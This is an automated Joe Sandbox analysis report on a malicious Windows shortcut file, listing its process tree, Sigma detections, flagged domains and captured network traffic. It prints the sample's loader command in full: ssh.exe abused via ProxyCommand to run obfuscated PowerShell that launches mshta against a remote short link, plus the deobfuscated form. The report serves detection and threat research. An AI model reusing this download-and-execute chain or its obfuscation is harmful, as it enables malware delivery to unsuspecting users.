Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bxAoaISZJQ.lnk

Overview

General Information

Sample name:bxAoaISZJQ.lnk
renamed because original name is a hash value
Original sample name:829cc902dbf7a10c6de99c6a0029e65d71e250d45a2a3baa8776699d22e5ee58.lnk.d.lnk
Analysis ID:1576543
MD5:0da62879f2963ca65e471a8de923b3d2
SHA1:915ac4e86c468f8fc0c3a3fc1a094a348eb4130c
SHA256:829cc902dbf7a10c6de99c6a0029e65d71e250d45a2a3baa8776699d22e5ee58
Tags:lnkstaticklipxuhaq-shopuser-JAMESWT_MHT
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Sigma detected: Potentially Suspicious PowerShell Child Processes
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Lolbin Ssh.exe Use As Proxy
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • ssh.exe (PID: 7216 cmdline: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('msh]]]]]]]ta.]]]]]]]e]]]]]x]]]]]]e h]]]]]]t]]]]]t]]]]]]]ps://]]]]]]g]]]]]]]o]]]]]o]]]]]].]]]]]]s]]]]]]u/]]]]]]J]]]]]3J]]]]]]Hq]]]]]]]I]]]]]]i' -replace ']')" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
    • conhost.exe (PID: 7244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7340 cmdline: powershell powershell -Command ('msh]]]]]]]ta.]]]]]]]e]]]]]x]]]]]]e h]]]]]]t]]]]]t]]]]]]]ps://]]]]]]g]]]]]]]o]]]]]o]]]]]].]]]]]]s]]]]]]u/]]]]]]J]]]]]3J]]]]]]Hq]]]]]]]I]]]]]]i' -replace ']') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7464 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://goo.su/J3JHqIi" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 7544 cmdline: "C:\Windows\system32\mshta.exe" https://goo.su/J3JHqIi MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • svchost.exe (PID: 7792 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://goo.su/J3JHqIi, CommandLine: "C:\Windows\system32\mshta.exe" https://goo.su/J3JHqIi, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://goo.su/J3JHqIi", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7464, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://goo.su/J3JHqIi, ProcessId: 7544, ProcessName: mshta.exe
Sigma detected: Lolbin Ssh.exe Use As Proxy
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('msh]]]]]]]ta.]]]]]]]e]]]]]x]]]]]]e h]]]]]]t]]]]]t]]]]]]]ps://]]]]]]g]]]]]]]o]]]]]o]]]]]].]]]]]]s]]]]]]u/]]]]]]J]]]]]3J]]]]]]Hq]]]]]]]I]]]]]]i' -replace ']')" ., CommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('msh]]]]]]]ta.]]]]]]]e]]]]]x]]]]]]e h]]]]]]t]]]]]t]]]]]]]ps://]]]]]]g]]]]]]]o]]]]]o]]]]]].]]]]]]s]]]]]]u/]]]]]]J]]]]]3J]]]]]]Hq]]]]]]]I]]]]]]i' -replace ']')" ., CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('msh]]]]]]]ta.]]]]]]]e]]]]]x]]]]]]e h]]]]]]t]]]]]t]]]]]]]ps://]]]]]]g]]]]]]]o]]]]]o]]]]]].]]]]]]s]]]]]]u/]]]]]]J]]]]]3J]]]]]]Hq]]]]]]]I]]]]]]i' -replace ']')" ., ProcessId: 7216, ProcessName: ssh.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell powershell -Command ('msh]]]]]]]ta.]]]]]]]e]]]]]x]]]]]]e h]]]]]]t]]]]]t]]]]]]]ps://]]]]]]g]]]]]]]o]]]]]o]]]]]].]]]]]]s]]]]]]u/]]]]]]J]]]]]3J]]]]]]Hq]]]]]]]I]]]]]]i' -replace ']'), CommandLine: powershell powershell -Command ('msh]]]]]]]ta.]]]]]]]e]]]]]x]]]]]]e h]]]]]]t]]]]]t]]]]]]]ps://]]]]]]g]]]]]]]o]]]]]o]]]]]].]]]]]]s]]]]]]u/]]]]]]J]]]]]3J]]]]]]Hq]]]]]]]I]]]]]]i' -replace ']'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('msh]]]]]]]ta.]]]]]]]e]]]]]x]]]]]]e h]]]]]]t]]]]]t]]]]]]]ps://]]]]]]g]]]]]]]o]]]]]o]]]]]].]]]]]]s]]]]]]u/]]]]]]J]]]]]3J]]]]]]Hq]]]]]]]I]]]]]]i' -replace ']')" ., ParentImage: C:\Windows\System32\OpenSSH\ssh.exe, ParentProcessId: 7216, ParentProcessName: ssh.exe, ProcessCommandLine: powershell powershell -Command ('msh]]]]]]]ta.]]]]]]]e]]]]]x]]]]]]e h]]]]]]t]]]]]t]]]]]]]ps://]]]]]]g]]]]]]]o]]]]]o]]]]]].]]]]]]s]]]]]]u/]]]]]]J]]]]]3J]]]]]]Hq]]]]]]]I]]]]]]i' -replace ']'), ProcessId: 7340, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7792, ProcessName: svchost.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://enduresopens.com/Avira URL Cloud: Label: malware
Source: https://enduresopens.com/ttkXIvunodY/69489pAvira URL Cloud: Label: malware
Source: https://enduresopens.com/ttkXIvunodY/69489-cl-ob.js?pubid=883146&siteid=330256&niche=33/6Avira URL Cloud: Label: malware
Source: https://enduresopens.com/ttkXIvunodY/69489oto:400&display=swapapAvira URL Cloud: Label: malware
Source: https://enduresopens.com/ttkXIvunodY/69489-cl-ob.js?pubid=883146&siteid=330256&niche=33DAAvira URL Cloud: Label: malware
Source: https://enduresopens.com/ttkXIvunodY/69489Avira URL Cloud: Label: malware
Source: https://enduresopens.com/ttkXIvunodY/69489eflateAvira URL Cloud: Label: malware
Source: https://enduresopens.com/ttkXIvunodY/69489n.Avira URL Cloud: Label: malware
Source: https://enduresopens.com/ttkXIvunodY/69489Sl8Avira URL Cloud: Label: malware
Source: https://enduresopens.com/ttkXIvunodY/69489C:Avira URL Cloud: Label: malware
Source: https://enduresopens.com/ttkXIvunodY/69489InternetAvira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: enduresopens.comVirustotal: Detection: 8%Perma Link
Multi AV Scanner detection for submitted file
Source: bxAoaISZJQ.lnkReversingLabs: Detection: 34%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.1% probability
Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknownHTTPS traffic detected: 109.200.199.111:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.109.170.83:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.180.204.90:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 88.212.201.204:443 -> 192.168.2.7:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.163.52.67:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 213.180.204.90 213.180.204.90
Source: Joe Sandbox ViewIP Address: 95.163.52.67 95.163.52.67
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /J3JHqIi HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: goo.suConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /frontend/js/redirect.js?id=399eaf833ac5f607b305c4ace0c25eb5 HTTP/1.1Accept: */*Referer: https://goo.su/J3JHqIiAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: goo.suConnection: Keep-AliveCookie: XSRF-TOKEN=eyJpdiI6InU4UGdiMlZJWEpHZFZwOU9RMkNVMGc9PSIsInZhbHVlIjoiM3lSVHE5R09EeVpUSDRtQjlJbkdhOEQwNGVNdFppc2tpRUhpR2lrTTErVCs5aGM0VXFuT2FKc2laZ3ZQcUJpRHljN0VrMzhrYk11Wmw0cW8ydFhRMlc1cHZSY0VXalRMVUdnL1NBQXA1WnQyTE9uQ3FMQXhscWNRSWphUEY1MmMiLCJtYWMiOiIxYjdjZGRjMTI3ODMwOGI0YmNlY2UyOTQ3YzkzZmYwN2RmYTU5YmU0YjJlOThhZmQzNmM4Y2JjNWZmN2M4NDRlIiwidGFnIjoiIn0%3D; goosu_session=eyJpdiI6IldTby8rRmhyV1NkcXhoaTNjZElXL0E9PSIsInZhbHVlIjoiRWFONmtYNWc4UGZ1SWNDWEcxUStMWEtzd1NKRm1vcTc1V3RqR0JFbVdacVAzbXgxdlhmSS9OWWZVRHFURlFZMjlwWUYxMnpaU2RlMjhyYm1yTFA0MEJDazB3MzRHZnZNeklSMWQ1eWUzdHNlRTh6NENpZm4zcUZ3NEdJNFI4N0siLCJtYWMiOiI1Mzg4YTBiZjk3ZWU0YzRjMzI2ZDE3MzJhZGJiNTYzNTlhNjRmNTQ0ZjY3NGExYTBhNTUxYTlhNTI2NzE0MDUwIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /richpartners/push/js/rp-cl-ob.js?pubid=883146&siteid=330256&niche=33 HTTP/1.1Accept: */*Referer: https://goo.su/J3JHqIiAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: richinfo.coConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ttkXIvunodY/69489 HTTP/1.1Accept: */*Referer: https://goo.su/J3JHqIiAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: enduresopens.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /system/context.js HTTP/1.1Accept: */*Referer: https://goo.su/J3JHqIiAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: an.yandex.ruConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /hit?t44.11;r;s1280*1024*32;uhttps%3A//goo.su/J3JHqIi;hRedirecting;0.009693880063321946 HTTP/1.1Accept: */*Referer: https://goo.su/J3JHqIiAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: counter.yadro.ruConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /js/code.js HTTP/1.1Accept: */*Referer: https://goo.su/J3JHqIiAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: top-fwz1.mail.ruConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /hit?q;t44.11;r;s1280*1024*32;uhttps%3A//goo.su/J3JHqIi;hRedirecting;0.009693880063321946 HTTP/1.1Accept: */*Referer: https://goo.su/J3JHqIiAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: counter.yadro.ruConnection: Keep-AliveCookie: FTID=1dOIkT0WQxex1dOIkT002Rcx
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /J3JHqIi HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: goo.suConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /frontend/js/redirect.js?id=399eaf833ac5f607b305c4ace0c25eb5 HTTP/1.1Accept: */*Referer: https://goo.su/J3JHqIiAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: goo.suConnection: Keep-AliveCookie: XSRF-TOKEN=eyJpdiI6InU4UGdiMlZJWEpHZFZwOU9RMkNVMGc9PSIsInZhbHVlIjoiM3lSVHE5R09EeVpUSDRtQjlJbkdhOEQwNGVNdFppc2tpRUhpR2lrTTErVCs5aGM0VXFuT2FKc2laZ3ZQcUJpRHljN0VrMzhrYk11Wmw0cW8ydFhRMlc1cHZSY0VXalRMVUdnL1NBQXA1WnQyTE9uQ3FMQXhscWNRSWphUEY1MmMiLCJtYWMiOiIxYjdjZGRjMTI3ODMwOGI0YmNlY2UyOTQ3YzkzZmYwN2RmYTU5YmU0YjJlOThhZmQzNmM4Y2JjNWZmN2M4NDRlIiwidGFnIjoiIn0%3D; goosu_session=eyJpdiI6IldTby8rRmhyV1NkcXhoaTNjZElXL0E9PSIsInZhbHVlIjoiRWFONmtYNWc4UGZ1SWNDWEcxUStMWEtzd1NKRm1vcTc1V3RqR0JFbVdacVAzbXgxdlhmSS9OWWZVRHFURlFZMjlwWUYxMnpaU2RlMjhyYm1yTFA0MEJDazB3MzRHZnZNeklSMWQ1eWUzdHNlRTh6NENpZm4zcUZ3NEdJNFI4N0siLCJtYWMiOiI1Mzg4YTBiZjk3ZWU0YzRjMzI2ZDE3MzJhZGJiNTYzNTlhNjRmNTQ0ZjY3NGExYTBhNTUxYTlhNTI2NzE0MDUwIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /richpartners/push/js/rp-cl-ob.js?pubid=883146&siteid=330256&niche=33 HTTP/1.1Accept: */*Referer: https://goo.su/J3JHqIiAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: richinfo.coConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ttkXIvunodY/69489 HTTP/1.1Accept: */*Referer: https://goo.su/J3JHqIiAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: enduresopens.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /system/context.js HTTP/1.1Accept: */*Referer: https://goo.su/J3JHqIiAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: an.yandex.ruConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /hit?t44.11;r;s1280*1024*32;uhttps%3A//goo.su/J3JHqIi;hRedirecting;0.009693880063321946 HTTP/1.1Accept: */*Referer: https://goo.su/J3JHqIiAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: counter.yadro.ruConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /js/code.js HTTP/1.1Accept: */*Referer: https://goo.su/J3JHqIiAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: top-fwz1.mail.ruConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /hit?q;t44.11;r;s1280*1024*32;uhttps%3A//goo.su/J3JHqIi;hRedirecting;0.009693880063321946 HTTP/1.1Accept: */*Referer: https://goo.su/J3JHqIiAccept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: counter.yadro.ruConnection: Keep-AliveCookie: FTID=1dOIkT0WQxex1dOIkT002Rcx
Source: global trafficDNS traffic detected: DNS query: goo.su
Source: global trafficDNS traffic detected: DNS query: richinfo.co
Source: global trafficDNS traffic detected: DNS query: enduresopens.com
Source: global trafficDNS traffic detected: DNS query: an.yandex.ru
Source: global trafficDNS traffic detected: DNS query: top-fwz1.mail.ru
Source: global trafficDNS traffic detected: DNS query: counter.yadro.ru
Source: svchost.exe, 0000000B.00000002.2537389371.000002576A40F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.11.dr, qmgr.db.11.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: mshta.exe, 00000008.00000002.2536346669.0000014F35E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://goo.su/
Source: mshta.exe, 00000008.00000002.2538729752.0000014F38D28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://goo.su/%
Source: mshta.exe, 00000008.00000002.2538729752.0000014F38D28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://goo.su/4
Source: powershell.exe, 00000007.00000002.1309161789.0000028900565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mshta.exe, 00000008.00000002.2539503014.0000014F3AA92000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2537391101.0000014F36A9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://scripts.sil.org/OFL
Source: mshta.exe, 00000008.00000003.1404399990.0000014F38EB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2539155100.0000014F38EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://scripts.sil.org/OFLOpenSans-RegularVersion
Source: mshta.exe, 00000008.00000002.2539543137.0000014F3AFA7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1390051694.0000014F36AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://scripts.sil.org/OFLWeightWidthNormalItalicRoman
Source: mshta.exe, 00000008.00000002.2539543137.0000014F3AFA7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2539503014.0000014F3AA92000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2537391101.0000014F36A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: mshta.exe, 00000008.00000003.1404399990.0000014F38D63000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1406072701.0000014F38E4F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2540906928.0000014F3CB20000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1403798862.0000014F38E4F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538565091.0000014F38CE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538729752.0000014F38D63000.00000004.00000020.00020000.00000000.sdmp, code[1].js.8.drString found in binary or memory: https://ad.mail.ru/retarget/?counter=
Source: mshta.exe, 00000008.00000003.1405909985.0000014F36ACB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ad.mail.ru/retarget/?counter=a.id
Source: powershell.exe, 00000007.00000002.1309161789.000002890058B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1309161789.000002890059F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: mshta.exe, 00000008.00000003.1369140620.0000014F36BCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1406447403.0000014734139000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1362063613.0000014F36BD1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538123104.0000014F36C13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.000001473413B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36C12000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.000001473411D000.00000004.00000020.00020000.00000000.sdmp, J3JHqIi[1].htm.8.drString found in binary or memory: https://cndef1.green-pathways.shop/api/uz/7552973650/index.mp4
Source: mshta.exe, 00000008.00000002.2538729752.0000014F38D28000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1403798862.0000014F38D1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404841844.0000014F38D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://counter.yadro.ru/
Source: mshta.exe, 00000008.00000002.2538729752.0000014F38D28000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1403798862.0000014F38D1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404841844.0000014F38D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://counter.yadro.ru/Yu
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://counter.yadro.ru/hit?q;t44.11;r;s1280
Source: mshta.exe, 00000008.00000002.2538565091.0000014F38CD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.000001473411D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://counter.yadro.ru/hit?t44.11;r;s1280
Source: mshta.exe, 00000008.00000002.2535430577.000001473411D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/bcfae741e379a885f2ab2cf83ebe6d32/mr
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/bcfae741e379a885f2ab2cf83ebe6d32/mr.
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enduresopens.com/
Source: mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538123104.0000014F36C13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538565091.0000014F38CD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enduresopens.com/ttkXIvunodY/69489
Source: mshta.exe, 00000008.00000003.1404980558.0000014F36BF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538123104.0000014F36BF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enduresopens.com/ttkXIvunodY/69489-cl-ob.js?pubid=883146&siteid=330256&niche=33/6
